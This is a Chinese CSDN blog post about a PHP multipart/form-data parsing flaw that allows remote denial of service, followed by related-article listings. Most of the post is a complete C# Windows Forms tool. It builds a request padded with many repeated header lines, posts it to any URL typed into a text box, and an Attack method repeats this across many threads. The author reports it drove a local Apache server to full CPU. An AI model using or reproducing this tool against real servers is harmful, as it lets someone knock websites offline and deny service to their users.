php multipart/form-data DOS C#测试工具

最新推荐文章于 2021-11-25 09:35:23 发布
最新推荐文章于 2021-11-25 09:35:23 发布
阅读量1.6k 收藏
点赞数
分类专栏: 后端 文章标签: php dos httpwebrequest c# 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/InsZVA/article/details/45933835
版权

根据乌云网,百度攻防安全实验室提供的最新漏洞,存在于php各版本:

PHP解析multipart/form-data http请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。

原文链接:http://drops.wooyun.org/papers/6077

大致是因为php解析请求时,是按行读取数据,然后每读取一行进行一次内存分配和内存拷贝,这样会耗掉n^2的时间,原文的利用方式是Python,现提供C#的代码:


对本地测试的结果,apache cpu占用100%:


代码:

using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;
namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void button1_Click(object sender, EventArgs e)
        {
            string s = HttpPostData().ToString();
            s = "响应时间:" + s;
            MessageBox.Show(s);
        }
        private double HttpPostData()
        {
            string url=this.textBox1.Text;
            int timeOut = 10000, lcount = int.Parse(textBox2.Text);
            string responseContent;
            string fileKeyName = "file";
            string filePath = "58.jpg";
            
            var memStream = new MemoryStream();
            var webRequest = (HttpWebRequest)WebRequest.Create(url);
            // 边界符
            var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");
            // 边界符
            var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");
           
            // 最后的结束符
            var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");

            // 设置属性
            webRequest.Method = "POST";
            webRequest.Timeout = timeOut;
            webRequest.ContentType = "multipart/form-data; boundary=" + boundary;

            // 写入文件
            const string filePartHeader =
                "Content-Disposition: form-data; name=\"{0}\"; filename=\"s";
            var header = string.Format(filePartHeader, fileKeyName);
            var headerbytes = Encoding.UTF8.GetBytes(header);

            memStream.Write(beginBoundary, 0, beginBoundary.Length);
            memStream.Write(headerbytes, 0, headerbytes.Length);

            var buffer = new byte[2];
            buffer = Encoding.UTF8.GetBytes("a\n");
            int bytesRead=2; // =0

            for (int i = 0; i < lcount;i++ )
                memStream.Write(buffer, 0, bytesRead);
            var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";
            bb += boundary;
            bb += "--";
            var body = new byte[1024];
            body=Encoding.UTF8.GetBytes(bb);
            
            memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));

            // 写入最后的结束边界符
            memStream.Write(endBoundary, 0, endBoundary.Length);

            webRequest.ContentLength = memStream.Length;

            var requestStream = webRequest.GetRequestStream();

            memStream.Position = 0;
            var tempBuffer = new byte[memStream.Length];
            memStream.Read(tempBuffer, 0, tempBuffer.Length);
            memStream.Close();

            requestStream.Write(tempBuffer, 0, tempBuffer.Length);
            requestStream.Close();
            DateTime d = DateTime.Now;
            var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();

            using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),
                                                            Encoding.GetEncoding("utf-8")))
            {
                responseContent = httpStreamReader.ReadToEnd();
            }

           
            httpWebResponse.Close();
            webRequest.Abort();
            
            return (DateTime.Now-d).TotalSeconds;
        }
        private void Attack()
        {
            string url = this.textBox1.Text;
            int timeOut = 10000, lcount = int.Parse(textBox2.Text);
            string responseContent;
            string fileKeyName = "file";
            string filePath = "58.jpg";

            var memStream = new MemoryStream();
            var webRequest = (HttpWebRequest)WebRequest.Create(url);
            // 边界符
            var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");
            // 边界符
            var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");

            // 最后的结束符
            var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");

            // 设置属性
            webRequest.Method = "POST";
            webRequest.Timeout = timeOut;
            webRequest.ContentType = "multipart/form-data; boundary=" + boundary;

            // 写入文件
            const string filePartHeader =
                "Content-Disposition: form-data; name=\"{0}\"; filename=\"s";
            var header = string.Format(filePartHeader, fileKeyName);
            var headerbytes = Encoding.UTF8.GetBytes(header);

            memStream.Write(beginBoundary, 0, beginBoundary.Length);
            memStream.Write(headerbytes, 0, headerbytes.Length);

            var buffer = new byte[2];
            buffer = Encoding.UTF8.GetBytes("a\n");
            int bytesRead = 2; // =0

            for (int i = 0; i < lcount; i++)
                memStream.Write(buffer, 0, bytesRead);
            var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";
            bb += boundary;
            bb += "--";
            var body = new byte[1024];
            body = Encoding.UTF8.GetBytes(bb);

            memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));

            // 写入最后的结束边界符
            memStream.Write(endBoundary, 0, endBoundary.Length);

            webRequest.ContentLength = memStream.Length;

            var requestStream = webRequest.GetRequestStream();

            memStream.Position = 0;
            var tempBuffer = new byte[memStream.Length];
            memStream.Read(tempBuffer, 0, tempBuffer.Length);
            memStream.Close();

            requestStream.Write(tempBuffer, 0, tempBuffer.Length);
            requestStream.Close();
            DateTime d = DateTime.Now;
            var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();

            using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),
                                                            Encoding.GetEncoding("utf-8")))
            {
                responseContent = httpStreamReader.ReadToEnd();
            }


            httpWebResponse.Close();
            webRequest.Abort();

        }
        private void button2_Click(object sender, EventArgs e)
        {            
            int n = int.Parse(textBox3.Text); 
            for(int i=0;i<n;i++)
            {
                new Thread(Attack).Start();
            }
        }
    }
}


InsZVA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php post上传文件,Multipart/form-data POST文件上传详解
weixin_32289847的博客
03-10 2728
转自:http://blog.csdn.net/xiaojianpitt/article/details/6856536Multipart/form-data POST文件上传详解理论简单的HTTP POST大家通过HTTP向服务器发送POST请求提交数据,都是通过form表单提交的,代码如下:提交时会向服务器端发出这样的数据(已经去除部分不相关的头信息),数据如下:POST / HTTP/1.1...
php http form的格式,multipart/form-data 格式的http请求,以及lua构造实现
weixin_30725317的博客
03-10 1276
大多数前端工程师对于这个multipart/form-data并不陌生,当我们需要发送二进制数据如图片时,通常会用到这个玩意儿~我们用form表单提交数据时,会指定form元素的enctype属性值为multipart/form-data,又或者使用html5新对象Formdata,我们用ajax发送数据时会指定content-type为multipart/form-data.multipart/...
PHP实现支持GET,POST,Multipart/form-data的HTTP请求类
01-20
本文实例讲述了PHP实现支持GET,POST,Multipart/form-data的HTTP请求类及其应用,分享给大家供大家参考。具体如下: HttpRequest.class.php类文件如下: <?php /** HttpRequest class, HTTP请求类,支持GET,POST,Multipart/form-data * Date: 2013-09-25 * Author: fdipzone * Ver: 1.0 * * Func: * public setConfig 设置连接参数 * public setFormdata 设置表单数据 * publ
PHP multipart/form-data 远程DOS漏洞
FFy's Blog
06-13 3822
0x00 摘要 PHP解析multipart/form-datahttp请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。 影响范围: PHP所有版本 0x01 漏洞入口 PHP源码中main/ rfc1867.c负责解析multipart/for
php post传递multipart/form-data数据,带图片和数据
wyj1122的博客
11-25 2046
php multipart/form-data
c#实现HttpClient拼接multipart/form-data形式参数post提交数据
01-09
使用c#实现的HttpClient拼接multipart/form-data形式参数post提交数据,包含图片内容,有需要的可以下载,希望能帮到有需要的人,
C#使用multipart/form-data示例
12-27
c#没有现成的multipart/form-data库,自己封的一个demo供参考。
c#下post multipart/form-data和JSON
01-09
c#下post 发送 multipart/form-data和JSON数据
c#模拟post发送json和multipart/form-data格式
01-06
c#模拟post发送json和multipart/form-data格式
WebAPIFileUploadDemo通过multipart/form-data方式同时上传文件以及数据包含客户端上传例子
07-23
WebAPI通过multipart/form-data方式同时上传文件以及数据包含客户端上传例子
form-data php,PHP中以multipart/form-data上传文件流
weixin_36413546的博客
03-09 840
class UploadPart{protected static $url;protected static $delimiter;protected static $instance;public function __construct() {static::$url = ‘http://files.note.so/v1/file_server‘;static::$delimiter = u...
PHP接收数据
WXY_Y的博客
10-29 1250
首先备注一下GET和POST提交方式的一些简单区别 1、post发送的数据更大(get有url长度限制) 2、post能发送更多的数据类型(get只能发送ASCII字符) 3、post比get慢 4、http协议并未规定get和post的长度限制,get的最大长度限制是因为浏览器和web服务器限制了URL的长度,不同的浏览器和web服务器,限制的最大长度不一样 1、multipart/form-data mult...
【技术分享】手把手教你“复活”乌云网
热门推荐
SAKAISON的博客
09-18 1万+
从乌云网升级说起 本人刚踏入安全圈不久,在学习的过程中除了阅读一些经典书籍外,像安全客、乌云网、Freebuf等网站也是我光顾最多的地方。在7月初,我有幸参加了今年的乌云峰会。然而,回来之后,激动的心情还没有平复,乌云网就进入升级状态!对于圈内人士来说,乌云网不仅是一个漏洞平台,也是一个巨大的知识库。现在乌云网因升级而导致不能访问,对于安全从业人员尤其是像我这样的安全小白来说,影响也是巨
php 文本 multipart/form-data,为什么上传文件时要设置为“multipart/form-data
weixin_35803436的博客
03-13 782
上传文件时要设置为“multipart/form-data”是因为此类型不适合用于传输大型二进制数据或者包含非ASCII字符的数据。Content-Type是什么?Content-Type 实体头部用于指示资源的MIME类型 media type 。在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。浏览器会在某些情况下进行MIME查找,并不一定遵循此标题的值; 为了防止这种...
php post 编码,php curl POST 编码方式 multipart/form-data与application/x-www-form-urlencode的区别...
weixin_39992957的博客
03-17 601
背景CURL在 a.php 中以 POST方式向 b.php 提交数据,但b.php无法接收到数据,而 CURL 操作显示成功。原来,"传递一个数组到CURLOPT_POSTFIELDS,CURL会把数据编码成 multipart/form-data,而传递一个URL-encoded字符串时,数据会被编码成 application/x-www-form-urlencoded"。但是在使用PHP C...
PHP中以multipart/form-data上传文件流
cigaogu2521的博客
06-17 4420
上传封装类 class UploadPart { protected static $url; protected static $delimiter; protected static $instance; public function __cons...
php 使用multipart/form-data的HTTP请求类
huangxy10的专栏
03-26 3101
这篇文章主要介绍了PHP实现支持GET,POST,Multipart/form-data的HTTP请求类,包括了连接与处理方式及相关的技巧,需要的朋友可以参考下 PHP实现支持GET,POST,Multipart/form-data的HTTP请求类及其应用,分享给大家供大家参考。具体如下: HttpRequest.class.php类文件如下: <?php /**
form-data php,phpmultipart/form-data方式Post提交数据
weixin_29903713的博客
03-09 2249
post的curl库,模拟post提交的时候,默认的方式multipart/form-data ,这个算是post提交的几个基础的实现方式。$postUrl = '';$postData = array('user_name'=>$userName,'identity_no'=>$idCardNo);$curl = curl_init();curl_setopt($curl, CUR...
multipart/form-data c# 解析入参
最新发布
09-01
multipart/form-data是一种常用的用于在HTTP协议中传输二进制数据的编码格式。它通常用于文件上传功能。 在HTTP中,请求和响应的数据被划分为多个部分,每个部分由特定的分隔符进行划分。每个数据部分中包含一个头部和一个内容体,头部用来描述这个数据部分的一些信息,例如数据类型、数据长度等。内容体就是实际的数据内容。 在multipart/form-data中,数据部分的内容体可以是任意类型的数据,例如文本、图片、音频等。当上传文件时,可以将文件数据直接放到内容体中进行传输。每个数据部分的头部中会指定Content-Disposition字段,用来告诉服务器接收到的数据应该如何处理,例如存储文件的路径和文件名。 使用multipart/form-data编码格式可以确保文件和其他数据正确地传输到服务器端。而不会出现数据被截断或改变的问题。同时multipart/form-data也支持多个文件上传的功能,可以一次性上传多个文件。 对于服务器端来说,接收multipart/form-data格式的数据相对比较复杂,需要进行数据解析。常见的处理multipart/form-data的方式是通过使用特定的库或框架,例如PHP中的$_FILES和Python中的Flask框架中的request.files来处理文件上传。 总结来说,multipart/form-data是一种专门用于传输二进制数据的编码格式,特别适用于文件上传功能。它能够确保数据正确地传输到服务器端,同时支持多个文件上传。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值